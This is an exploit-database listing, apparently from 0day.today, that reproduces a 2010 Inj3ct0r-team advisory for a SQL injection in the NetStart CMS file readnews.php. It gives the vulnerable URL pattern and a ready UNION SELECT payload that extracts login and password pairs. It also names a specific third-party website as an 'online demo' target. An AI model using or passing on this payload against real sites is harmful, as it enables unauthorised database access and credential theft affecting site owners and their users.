[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NetStart (readnews.php) SQL Injection Vulnerability

Author
The_Exploited
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12191
Category
web applications
Date add
10-05-2010
Platform
php
===================================================
NetStart (readnews.php) SQL Injection Vulnerability
===================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                 ###########################################          1
0                 I'm The_Exploited member from Inj3ct0r Team          1
1                 ###########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: The_Exploited

@Title: NetStart (readnews.php) SQL Injection Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@PHP File Bugged (readnews.php): http://www.mysite.com/[PATH]/readnews.php?id=[SQLi]

@SQL Injection: -NULL+UNiON+ALL+SELECT+1,concat(login,0x3a,pass),3,4,5+FROM+[PATH]

@Demo online: http://www.cpm-online.it/readnews.php?id=[SQLi]

@CMS Version: All

@CMS Download: http://www.netstart.it/

@Date: 2010-05-10



#  0day.today [2024-12-26]  #